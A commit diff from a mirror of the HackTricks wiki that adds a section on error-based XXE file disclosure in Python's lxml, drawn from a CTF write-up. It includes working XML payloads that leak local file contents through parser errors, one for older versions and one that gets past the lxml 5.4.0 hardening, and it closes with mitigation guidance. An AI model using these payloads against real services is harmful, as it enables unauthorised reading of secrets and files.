maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1101 from HackTricks-wiki/update_Dojo_CTF_Challenge__42__Hex_Color_Palette_XXE_File_20250711_183320

Browse Source 
Dojo CTF Challenge #42 Hex Color Palette XXE File Disclosure...
This commit is contained in:
SirBroccoli 2025-07-12 11:40:31 +02:00 committed by GitHub
commit 1d1354c07d
1 changed files with 67 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

67
src/pentesting-web/xxe-xee-xml-external-entity.md
View File

@ -1,5 +1,10 @@
# XXE - XEE - XML External Entity
{{#include /banners/hacktricks-training.md}}
- [Dojo CTF Challenge #42 Hex Color Palette XXE write-up](https://www.yeswehack.com/dojo/dojo-ctf-challenge-winners-42)
- [lxml bug #2107279 Parameter-entity XXE still possible](https://bugs.launchpad.net/lxml/+bug/2107279)
{{#include ../banners/hacktricks-training.md}}
## XML Basics
@ -773,6 +778,65 @@ Take a look to this amazing report [https://swarm.ptsecurity.com/impossible-xxe-
https://github.com/luisfontes19/xxexploiter
{{#endref}}
### Python lxml Parameter-Entity XXE (Error-Based File Disclosure)
> [!INFO]
> The Python library **lxml** uses **libxml2** under the hood. Versions prior to **lxml 5.4.0 / libxml2 2.13.8** still expand *parameter* entities even when `resolve_entities=False`, making them reachable when the application enables `load_dtd=True` and/or `resolve_entities=True`. This allows Error-Based XXE payloads that embed the contents of local files into the parser error message.
#### 1. Exploiting lxml < 5.4.0
1. Identify or create a *local* DTD on disk that defines an **undefined** parameter entity (e.g. `%config_hex;`).
2. Craft an internal DTD that:
* Loads the local DTD with `<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">`.
* Redefines the undefined entity so that it:
- Reads the target file (`<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">`).
- Builds another parameter entity that refers to an **invalid path** containing the `%flag;` value and triggers a parser error (`<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">`).
3. Finally expand `%local_dtd;` and `%eval;` so that the parser encounters `%error;`, fails to open `/aaa/<FLAG>` and leaks the flag inside the thrown exception which is often returned to the user by the application.
```xml
<!DOCTYPE colors [
<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">
<!ENTITY % config_hex '
<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">
%eval;'>
%local_dtd;
]>
```
When the application prints the exception the response contains:
```
Error : failed to load external entity "file:///aaa/FLAG{secret}"
```
> [!TIP]
> If the parser complains about `%`/`&` characters inside the internal subset, double-encode them (`&#x26;#x25;``%`) to delay expansion.
#### 2. Bypassing the lxml 5.4.0 hardening (libxml2 still vulnerable)
`lxml` ≥ 5.4.0 forbids *error* parameter entities like the one above, but **libxml2** still allows them to be embedded in a *general* entity. The trick is to:
1. Read the file into a parameter entity `%file`.
2. Declare another parameter entity that builds a **general** entity `c` whose SYSTEM identifier uses a *non-existent protocol* such as `meow://%file;`.
3. Place `&c;` in the XML body. When the parser tries to dereference `meow://…` it fails and reflects the full URI including the file contents in the error message.
```xml
<!DOCTYPE colors [
<!ENTITY % a '
<!ENTITY % file SYSTEM "file:///tmp/flag.txt">
<!ENTITY % b "<!ENTITY c SYSTEM 'meow://%file;'>">
'>
%a; %b;
]>
<colors>&c;</colors>
```
#### Key takeaways
* **Parameter entities** are still expanded by libxml2 even when `resolve_entities` should block XXE.
* An **invalid URI** or **non-existent file** is enough to concatenate controlled data into the thrown exception.
* The technique works **without outbound connectivity**, making it ideal for strictly egress-filtered environments.
#### Mitigation guidance
* Upgrade to **lxml ≥ 5.4.0** and ensure the underlying **libxml2** is **≥ 2.13.8**.
* Disable `load_dtd` and/or `resolve_entities` unless absolutely required.
* Avoid returning raw parser errors to the client.
## References
- [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)
@ -784,4 +848,7 @@ https://github.com/luisfontes19/xxexploiter
- [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)
- [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7)
- [Dojo CTF Challenge #42 Hex Color Palette XXE write-up](https://www.yeswehack.com/dojo/dojo-ctf-challenge-winners-42)
- [lxml bug #2107279 Parameter-entity XXE still possible](https://bugs.launchpad.net/lxml/+bug/2107279)
{{#include ../banners/hacktricks-training.md}}